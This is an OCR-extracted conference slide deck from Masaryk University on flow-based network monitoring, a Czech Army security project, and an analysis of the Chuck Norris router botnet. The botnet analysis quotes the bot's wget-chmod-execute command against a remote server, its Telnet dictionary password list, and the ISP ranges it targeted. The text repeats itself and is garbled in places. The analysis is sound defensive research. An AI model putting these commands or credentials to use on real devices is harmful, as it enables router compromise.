Army & Academia Cyber Security Research in Czech Republic Jan Vykopal Institute of Computer Science Masaryk University Brno, Czech Republic vykopalOics.muni.cz October 18, 2012 Manama, Bahrain Part I Masaryk University, Brno, Czech Republic Jan Vykopal Army & Academia Cyber Security Research in Czech Republic 2/29 Brno, Czech Republic o 2nd largest city (next to Prague). o -400,000 inhabitants, -100,000 students! o Home to a number of institutions directly related to R&D (AVG, IBM, Honeywell). Masaryk University o 2nd largest university in the country, o -45,000 students, -5,000 staff, o -15,000 hosts online every day. 0 2x 10 gigabit uplinks to internet. Part II R&D Timeline Jan Vykopal Army & Academia Cyber Security Research in Czech Republic 4/29 Before 2008 o 2004 Czech NREN CESNET, Masaryk University and Brno University of Technology built the first 10 gigabit network interface card in academia world. 9 2005-2007 first two university spin-off companies established. 9 2007 CAMNEP project - Cooperative Adaptive Mechanism for Network Protection - for U. S. Army. Jan Vykopal Army & Academia Cyber Security Research in Czech Republic 5/29 o 2008 CYBER project for Czech Army started. o 2008-2009 CAMNEP project follow-up. o 2009 CSIRT-MU - Computer Security Incident Response Team of Masaryk University established. o 2010 a new botnet named Chuck Norris discovered. o 2011 cooperation with Czech National Security Authority that operates Czech governmental CERT. Part III Network Security Monitoring at Masaryk University Jan Vykopal Army & Academia Cyber Security Research in Czech Republic 7/29 FlowMon Probes at Masaryk University Campus Jan Vykopal Army & Academia Cyber Security Research in Czech Republic 8/29 1/10 GE FlowMon probe FlowMon probe FlowMon probe Net Flow data acquisition NetFlow data acquisition NetFlow data collection probe NetFlow data acquisition NetFlow data collection NetFlow data analyses Network without any flow monitoring system. FlowMon probe connected to in-line TAP. FlowMon observes data from TAP and SPAN ports. o NfSen - NetFlow Sensor - http://nfsen.sf.net/ o NFDUMP - NetFlow display - http://nfdump.sf.net/ Part IV CYBER project Jan Vykopal Army & Academia Cyber Security Research in Czech Republic 12 / 29 Validation of advanced probe utilization in active network protection. o Analysis of up-to-date network threats and protection against them. o Automatic reaction to security threats. Deployment of project results in real networks by the CIRC of Czech Ministry of Defence and the CSIRT-MU. o Detection of SSH/RDP o Detection of infiltrated dictionary attacks. devices in the network. Active network protection o blocking o filtering o limiting o (phishing) quarantine o counterattack Features o Traffic distribution among multiple CPU cores. o Network applications with hardware acceleration. o Capable of concurrent monitoring/blocking/filtering/etc. HAMOC NetFlow DPI |u||-| Control Module mm Malicious traffic Legitimate traffic Part V Chuck Norris Botnet Jan Vykopal Army & Academia Cyber Security Research in Czech Republic 17 / 29 What is "new" BP o Attack against network devices. o Users are not aware about the attack. o Infected devices are permanently connected to the Internet. Short Summary o Attacks Linux MIPSEL devices (ADSL modems, WIFI routers). o No anti-* solution. o Access to all user's traffic. o Based on known techniques and components. Botnet Analysis - I Jan Vykopal Botnet monitoring and analysis testbed. Army & Academia Cyber Security Research in Czech Republic 19 / 29 Botnet monitoring and analysis testbed. Botnet monitoring and analysis testbed ASUS WLSOOgP (agent-provocateur) Botnet monitoring and analysis testbed. ASUS WLSOOgP (agent-provocateur) Botnet monitoring and analysis testbed. infected device list of C class networks to scan IP Range Owner IP Range Owner 217.236.0.0/16 Deutsche Telekom 88.253.0.0/16 TurkTelekom 87.22.0.0/16 Telecom Italia 220.240.0.0/16 Comindico Australia 85.174.0.0/16 Volgograd Electro Svyaz 222.215.0.0/16 China Telecom 201.1.0.0/16 Telecomunicacoes de Sao Paulo 200.121.0.0/16 Telefonica del Peru Tab. 1: Example of botnet propagation targets. IP Range Owner IP Range Owner 217.236.0.0/16 Deutsche Telekom 88.253.0.0/16 TurkTelekom 87.22.0.0/16 Telecom Italia 220.240.0.0/16 Comindico Australia 85.174.0.0/16 Volgograd Electro Svyaz 222.215.0.0/16 China Telecom 201.1.0.0/16 Telecomunicacoes de Sao Paulo 200.121.0.0/16 Telefonica del Peru Tab. 1: Example of botnet propagation targets. IP Range Owner IP Range Owner 217.236.0.0/16 Deutsche Telekom 88.253.0.0/16 TurkTelekom 87.22.0.0/16 Telecom Italia 220.240.0.0/16 Comindico Australia 85.174.0.0/16 Volgograd Electro Svyaz 222.215.0.0/16 China Telecom 201.1.0.0/16 Telecomunicacoes de Sao Paulo 200.121.0.0/16 Telefonica del Peru Tab. 1: Example of botnet propagation targets. infected device victim TELNET service dictionary attack infected victim device admin, Admin, password, root, 1234, private, XAlbacOMX, adsll234, %%fuckinside%%, dreambox, blank password admin admin, password, blank password Tab. 2: Passwords used for a dictionary attack. TELNET service download current bot version dictionary attack -► infected victim device admin, Admin, password, root, 1234, private, XAlbacOMX, adsll234, %%fuckinside%%, dreambox, blank password admin admin, password, blank password Tab. 2: Passwords used for a dictionary attack. bat deny remote access (ports 22-80) infected device deny remote access (ports 22-80) infected device J^S®5 2. Topic: !* init-cmd l| I server (get scan-tools) infected device Initial Command (IRC Topic): :!* sh wget http://87.98.163.86/pwn/scan.sh;chmod u+x scan.sh;./scan.sh Initial Command (IRC Topic): :!* sh wget http://87.98.163.86/pwn/scan.sh;chmod u+x scan.sh;./scan.sh Botnet Threats o Denial-of-Service attacks - DoS, DDoS. o DNS spoofing attack. o Infected device reconfiguration. t < Consequences for Users o The link was saturated with malicious traffic activities. o Economic losses and criminal sanctions against unaware users. DNS Spoofing Attack o Web page redirect: o www.facebook.com o www.google.com o Malicious code execution. t 1 primary secondary DNS server , DNS server infected router DNS Spoofing Attack o Web page redirect: o www.facebook.com o www.google.com o Malicious code execution. botnet C&C Center OpenDNS.com t 1 primary secondary DNS server , DNS server www.facebool DNS Spoofing Attack o Web page redirect: o www.facebook.com o www.google.com o Malicious code execution. botnet C&C Center OpenDNS.com DNS Spoofing Attack o Web page redirect: o www.facebook.com o www.google.com o Malicious code execution. botnet C&C Center OpenDNS.com www.linux.org Attacks Against Masaryk University Network 1 1 1 1 1 1 Telnet Scans Against Masaryk University Network ........ ZU W i.il 1 : t : : : i í : i ' '■ '■ ' II i '"■ : -: ......-: i Pii 1 1000 c 3 Nov 1 Dec 1 Feb 1 Mar 1 Apr 1 33 000 unique attackers (infected devices) from 2009/10 2010/02. Army & Academia Cyber Security Research in Czech Republic Attacks Against Masaryk University Network Jan Vykopal Army & Academia Cyber Security Research in Czech Republic 25 / 29 Attacks Against Masaryk University Network Jan Vykopal Army & Academia Cyber Security Research in Czech Republic 25 / 29 Media o Czech Ministry of Defence o Czech Television o Czech Radio o New York Times 0 Computerworld Security Community o 150 alerts to abuse mails o AVG o Kašpersky Lab o NATO CIRC o TF-CSIRT o Shadowserver.org COMPUTERWORLD But in 2011 we spot a new version in the wild. Part VI Conclusion Jan Vykopal Army & Acad em ia Cyber Security Research in Czech Republic 27 / 29 Conclusion o Flow-based network intrusion detection and protection is suitable for large and high-speed networks. o Online network monitoring contributes to the overall security. o Any device connected to network is dangerous. o They are not anti-* solutions for ubiquitous networking. Jan Vykopal Army & Academia Cyber Security Research in Czech Republic 28 / 29 Questions? Jan Vykopal Army & Academia Cyber Security Research in Czech Republic 29 / 29